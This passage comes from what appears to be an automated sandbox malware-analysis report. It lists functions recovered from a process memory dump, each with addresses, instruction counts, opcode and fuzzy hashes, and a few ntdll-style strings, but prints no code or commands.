                                    • Instruction Fuzzy Hash: 61900260B5191186DF2867F27C1D50575E05AA96067414464F001C9048DF6041485661
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 03A62D8A, Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID: RTL: Re-Waiting
                                    • API String ID: 0-316354757
                                    • Opcode ID: d9df7ebd63db8823f04cab96bf09034740ebade47c25e3bee05a577e64251619
                                    • Instruction ID: e27cbf11f5ad6df85138d6a4f7d9deeb87a5fddfcbabf58751253f03b5abb4cf
                                    • Opcode Fuzzy Hash: d9df7ebd63db8823f04cab96bf09034740ebade47c25e3bee05a577e64251619
                                    • Instruction Fuzzy Hash: 59610471A00744EFDB25DB68C944BBEBBB9EB45714F1C4AAFE8119B2C2C73499008791
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 03B30EA5, Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID: `
                                    • API String ID: 0-2679148245
                                    • Opcode ID: 5226026d752b7aac99165940959d2802b3eeea7501ecd15df91f4abe28c15a23
                                    • Instruction ID: e55eafc6d92f3cecbbcd30ec49e8538e81f7c075ccda6c8b5e8ba678fd4e56fd
                                    • Opcode Fuzzy Hash: 5226026d752b7aac99165940959d2802b3eeea7501ecd15df91f4abe28c15a23
                                    • Instruction Fuzzy Hash: BD51BF712043519FD325EF29D980B6BB7E9EFC5208F040ABDF9969B290D731E805CB62
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 03A9F0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID: @
                                    • API String ID: 0-2766056989
                                    • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                    • Instruction ID: 260d87be6d43275adb15275e387056e8b67ddb2bf57b2a3956f009ce0e77cc16
                                    • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                    • Instruction Fuzzy Hash: C1517C76504711AFD320DF19C840A6BBBF8FF48710F10892EF9959B6A0E7B4E904CBA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 03AE3540, Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID: BinaryHash
                                    • API String ID: 0-2202222882
                                    • Opcode ID: e8f0fb91c86fd76d7bf56f925a6f359d91b1549ca4f13150b05ec906294c9339
                                    • Instruction ID: cc6710006c3322849d7f492a3355ad117c280a27be009abf26077601f002206b
                                    • Opcode Fuzzy Hash: e8f0fb91c86fd76d7bf56f925a6f359d91b1549ca4f13150b05ec906294c9339
                                    • Instruction Fuzzy Hash: CA4137B690162CABDF11DB64CD80FDEB77CAB44714F0045D6A609AB280DB349E888F94
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 03AE3884, Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID: BinaryName
                                    • API String ID: 0-215506332
                                    • Opcode ID: 08a65b0d3499c54452045e400a341f46fedf0c2c7d1ca236ffa9efe39ed4a665
                                    • Instruction ID: 082237853b6aea45cba90cb6c999e00ea1b887c4227d3bd187da97af92bd5e00
                                    • Opcode Fuzzy Hash: 08a65b0d3499c54452045e400a341f46fedf0c2c7d1ca236ffa9efe39ed4a665
                                    • Instruction Fuzzy Hash: BF31F17AD0161ABFEF15DB59C955E6FF778EF80B20F02416AA914AB380D7309E00C7A0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 03A9D294, Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID: @
                                    • API String ID: 0-2766056989
                                    • Opcode ID: 69d900c1f7a1aff193f201c1e19b5d0bd02d22e794603aa71d94b9b9a97e3311
                                    • Instruction ID: 4e0d8a7094a9084ce63483409589e858ca227ca5317b79276f3e0bd32bbf8db4
                                    • Opcode Fuzzy Hash: 69d900c1f7a1aff193f201c1e19b5d0bd02d22e794603aa71d94b9b9a97e3311
                                    • Instruction Fuzzy Hash: A631C2B65083059FDB10DF29C98096BBBF8EB89654F04092FF994A7310D734DD44CB92
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 03A71B8F, Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID: WindowsExcludedProcs
                                    • API String ID: 0-3583428290
                                    • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                    • Instruction ID: 72b74f02ad33cd9ebbe8661dd25a7a66dfc466743cfd6d03c0cf3e8b53c103a2
                                    • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                    • Instruction Fuzzy Hash: 8921F237500628ABCB21DB99CD89F6BB7FDAF81A50F09446BF9049B200D635DD00DBA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 03A8F716, Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID: Actx
                                    • API String ID: 0-89312691
                                    • Opcode ID: 2afe91415ede3ccb5d110f0f4ac0316cf9b5a9b670330e9708aca1924b5202a2
                                    • Instruction ID: b331c7934991bac683814253b977adc61a33da9d104029e7ab8c770efd0a592a
                                    • Opcode Fuzzy Hash: 2afe91415ede3ccb5d110f0f4ac0316cf9b5a9b670330e9708aca1924b5202a2
                                    • Instruction Fuzzy Hash: 5B1186357046038FF724EF1DA990736B2A9AB9B664F29452FE466CB391DB74C8418740
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 03B18DF1, Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                    Download Yara Rule
                                    Strings
                                    • Critical error detected %lx, xrefs: 03B18E21
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID: Critical error detected %lx
                                    • API String ID: 0-802127002
                                    • Opcode ID: b12fcd40686dd6bab4e60449ecb28cb867d9b5abb5c99ef1d8111d0ca0171f6a
                                    • Instruction ID: 7f81aad21d5c09dbe1e5eb30ea66b26640aff7314fbc368a1a7c60da7a9d952a
                                    • Opcode Fuzzy Hash: b12fcd40686dd6bab4e60449ecb28cb867d9b5abb5c99ef1d8111d0ca0171f6a
                                    • Instruction Fuzzy Hash: F8113576D14348EADB24DFA88A057DDBBB5BB04318F2442AEE529AB392C3345602CF15
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 03AFFF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                    Download Yara Rule
                                    Strings
                                    • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 03AFFF60
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                    • API String ID: 0-1911121157
                                    • Opcode ID: 7e39ef825f78c448e326a4e6a8274a170ce5e4b3f81730a6fd4524b8ff69d735
                                    • Instruction ID: d23e2033f61da4e072e19ad2a2d032aebf66eeb953d97c7621f7f7a12e791031
                                    • Opcode Fuzzy Hash: 7e39ef825f78c448e326a4e6a8274a170ce5e4b3f81730a6fd4524b8ff69d735
                                    • Instruction Fuzzy Hash: BD110875910244EFDB21EF90CA44F9CB7B1FF05718F148056F6056B661C7399940CB50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 03B35BA5, Relevance: .6, Instructions: 592COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 32abfb9e7832aac0c32833e15c004ee6ae0053e656eae6c0bb043afe35f6b988
                                    • Instruction ID: 8f59d5d8fae5838b05035aa3d2e11a00670332eae026d3b6e617910a311280c0
                                    • Opcode Fuzzy Hash: 32abfb9e7832aac0c32833e15c004ee6ae0053e656eae6c0bb043afe35f6b988
                                    • Instruction Fuzzy Hash: 96424A759002299FDB24CF68C980BA9B7B1FF46308F1981EAD94DAB242D7749A85CF50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 03A84120, Relevance: .4, Instructions: 444COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f73360cbb03fee84bb7cf3cab907abb076eb34f54e78a6dd27a25d5c7721c5d8
                                    • Instruction ID: 30213765e7f2f19463e9c60009c904aadc2e6d6d71a93621dbb09b6845dd230c
                                    • Opcode Fuzzy Hash: f73360cbb03fee84bb7cf3cab907abb076eb34f54e78a6dd27a25d5c7721c5d8
                                    • Instruction Fuzzy Hash: 3CF15A746183528BC728EF1AC480A3AF7E5EF98714F58496FF8868B250E734D991CB52
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 03A920A0, Relevance: .4, Instructions: 420COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4f802854cf873c72d20d334da49f394b238561b99ee720ae95cddea801891a18
                                    • Instruction ID: 5e07b16606230da00fe60633e60bd7135bd06e499b34c1237548415e3c4f10f3
                                    • Opcode Fuzzy Hash: 4f802854cf873c72d20d334da49f394b238561b99ee720ae95cddea801891a18
                                    • Instruction Fuzzy Hash: B4F1DA35A08349AFEB25CF28C54076BB7E5AF86314F18896FE896AF350D734D841CB52
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 03A7D5E0, Relevance: .4, Instructions: 353COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d04754168b672a25c9cb141e6c00a441fae30a80e2da88a3c966855413b5294d
                                    • Instruction ID: 952d7af04aba19a274f4bd8a5fa5d97f601c0aa4a49bd71e773955bea48ca578
                                    • Opcode Fuzzy Hash: d04754168b672a25c9cb141e6c00a441fae30a80e2da88a3c966855413b5294d
                                    • Instruction Fuzzy Hash: 67E19034A003598FDB24DF28CE95BA9B7B5BF46304F0841EFD809AB790D775A981CB61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 03A7849B, Relevance: .3, Instructions: 290COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 66581706b1683bbb4c2ca12cddec7d7646d58ca7f4aee5beb8c615d23fe1b555
                                    • Instruction ID: 5dbe0868a1b2e730ee4c2c30097a46e2cf2c07d520f7b26a49b9007d45d0d313
                                    • Opcode Fuzzy Hash: 66581706b1683bbb4c2ca12cddec7d7646d58ca7f4aee5beb8c615d23fe1b555
                                    • Instruction Fuzzy Hash: 33B15B74E00349EFCB24DF99CA85AAEBBB9BF49304F14412FE415AB345DB78A941CB50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 03A9513A, Relevance: .3, Instructions: 258COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: afae4b0b92e6896312e99cc9a7d5c85ec35223a2fb5f1797eff225521a103085
                                    • Instruction ID: 31ac88d95f68cb27f9ea86a8a3c843948f324ded1d2face1dc182452418e930e
                                    • Opcode Fuzzy Hash: afae4b0b92e6896312e99cc9a7d5c85ec35223a2fb5f1797eff225521a103085
                                    • Instruction Fuzzy Hash: 62C133755083808FD755CF28C580A6AFBF1BF89304F184A6EF89A9B362D771E945CB42
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 03A903E2, Relevance: .3, Instructions: 254COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8745080fd55a4a441214c5ec0f25c52842d64831a845ee51a179be38ab04b74a
                                    • Instruction ID: 6ca3ea7cc6d85e2f2d2b90d931ffe28f9578ed08f9b10c302c832a96cfbf1520
                                    • Opcode Fuzzy Hash: 8745080fd55a4a441214c5ec0f25c52842d64831a845ee51a179be38ab04b74a
                                    • Instruction Fuzzy Hash: 0F910531E00714EBEF21DB69C944BADB7E4AB49754F09026BE952BB2D0DB749C40C791
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 03A6C600, Relevance: .2, Instructions: 225COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a5e680e3b236a2a7ee08ae08c309fedc4dbe6f4ba08471eb855a3975eab26ab0
                                    • Instruction ID: 9ee402661f9fcbbf67086f36f7ae3359f31444a84c1afb6cf7fa9ba17eb8eb54
                                    • Opcode Fuzzy Hash: a5e680e3b236a2a7ee08ae08c309fedc4dbe6f4ba08471eb855a3975eab26ab0
                                    • Instruction Fuzzy Hash: 1D818C7A6047019FCB29CF14C880A7AB3A8FB84254F58486FED479B254D332ED41CBA2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 03AE6DC9, Relevance: .2, Instructions: 199COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                    • Instruction ID: d4d8adb321bd0beebee39fe7879c2f21263d8d901688f0e4a5dad4ac13d80d11
                                    • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                    • Instruction Fuzzy Hash: 13715E75A00619AFCB10EFA5CA44AEEFBB9FF48710F14456AE505AB350DB34EA41CB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 03AFB8D0, Relevance: .2, Instructions: 199COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3540a714e5887d1fcee87da2a17379292686ab0d37b191f9439146fe1f77cf87
                                    • Instruction ID: c2ff69e2dc35ee5baeab68e1e8835cbeeb838e516cda3ca46fd6d23d0fc35152
                                    • Opcode Fuzzy Hash: 3540a714e5887d1fcee87da2a17379292686ab0d37b191f9439146fe1f77cf87
                                    • Instruction Fuzzy Hash: B8710136200B05AFD731EF98C981F56BBF5EB44720F28492EF6558B6A0DB75E940CB60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 03A652A5, Relevance: .2, Instructions: 161COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f4f4ac17fc6b2952c534b62c9f488ea8fa370a6763b199b90b44e9c175baf5b7
                                    • Instruction ID: b82e2c226cdf81c9d0b6bdb703ea46e9915499a51a8ef83eff7a1c61cf7e3daf
                                    • Opcode Fuzzy Hash: f4f4ac17fc6b2952c534b62c9f488ea8fa370a6763b199b90b44e9c175baf5b7
                                    • Instruction Fuzzy Hash: 1551EC75205782AFC721EF68CA41B2BBBE8FF84714F14095FE4968B651E770E844CB92
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 03A92AE4, Relevance: .2, Instructions: 159COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 35cd4e25a618b9033f3457678b7383555a08f1c7da859144f1e062b81292cc82
                                    • Instruction ID: 1b7fea8be7bf6d7087835b60f9742dab7984d36edf88ab84124707ee18c5407c
                                    • Opcode Fuzzy Hash: 35cd4e25a618b9033f3457678b7383555a08f1c7da859144f1e062b81292cc82
                                    • Instruction Fuzzy Hash: CB519C7AF001299FDF18DF1DC890ABDB7F1BB88704716895BE846AB354D730AA51CB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 03A8DBE9, Relevance: .1, Instructions: 149COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 384afbe1f85b3cdea1c6119db27541d8e18e9b7bf36945b12f866196f5c14ec0
                                    • Instruction ID: fb4a85c47d1f9d4f62f558539741e0b8efcf47abc74d46f0798c0d9b1cab2523
                                    • Opcode Fuzzy Hash: 384afbe1f85b3cdea1c6119db27541d8e18e9b7bf36945b12f866196f5c14ec0
                                    • Instruction Fuzzy Hash: F051A1B5A01215CFCB14EF68C590AAEFBF5BB48314F24865BD955AB380DB31AD44CB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 03A7EF40, Relevance: .1, Instructions: 147COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                    • Instruction ID: 5f8931b76c12cf3c8da053cec4d8d410e923c08f45cfbbe1af95a62ef87ba9ee
                                    • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                    • Instruction Fuzzy Hash: 7551E230A04249EFDB24CB68C9D0BAEFBB1AF05314F1C81EED45597781D376AA8AC751
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 03A92990, Relevance: .1, Instructions: 133COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a4c1faf4415031fd538ed32343d753a07b4b1f83cda3715e98bbcf2f8e56336b
                                    • Instruction ID: 87a946ac52288faf2293b85c601e2a1d00a76cb87a9aeb518f81c12969c89ec2
                                    • Opcode Fuzzy Hash: a4c1faf4415031fd538ed32343d753a07b4b1f83cda3715e98bbcf2f8e56336b
                                    • Instruction Fuzzy Hash: AE513876900219EFEF25DF55C980ADEBBB5BF48310F14845BE815BB360C3359992CB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 03A94BAD, Relevance: .1, Instructions: 131COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1c79016d86b1f46c4d850b42c484900326606cb983ad91548c98c19d15ee1158
                                    • Instruction ID: 78656ee1f4da984bfed3eb3ec5d42b4811aa7fcfd08889869e83b83a84034307
                                    • Opcode Fuzzy Hash: 1c79016d86b1f46c4d850b42c484900326606cb983ad91548c98c19d15ee1158
                                    • Instruction Fuzzy Hash: EB41A535A002289FDF20DF69C944BEAB7B8EF49710F4504ABE909AB350D7749E85CB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 03A94D3B, Relevance: .1, Instructions: 131COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5de9c38f041e3748c13a186155011b25d9e66698d92c0ce71762d4cefee2035d
                                    • Instruction ID: d6d19e0fb1ec0e24bf12a958f6c4271bb97757a673fc5045c724580a6cfa5d8d
                                    • Opcode Fuzzy Hash: 5de9c38f041e3748c13a186155011b25d9e66698d92c0ce71762d4cefee2035d
                                    • Instruction Fuzzy Hash: 1941C275A40318AFEF21DF15CD84FAAB7E9EB49610F0840ABE945AB380DB74DD41CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 03A78A0A, Relevance: .1, Instructions: 120COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: bdc5ea0745017680ad2e4586d18531b12af363aeb4cd7b59f84e65ecab3b6a56
                                    • Instruction ID: b6d9bfaecdc972f06b0e856a19b9e39d1da0d6c0878d56d84a5ca964a0d05407
                                    • Opcode Fuzzy Hash: bdc5ea0745017680ad2e4586d18531b12af363aeb4cd7b59f84e65ecab3b6a56
                                    • Instruction Fuzzy Hash: 9E415DB5A403289BDB24DF59CCCDAAAB3BCEB84300F1545EBD81997251E7749E80CF60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 03AE69A6, Relevance: .1, Instructions: 108COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp Download File
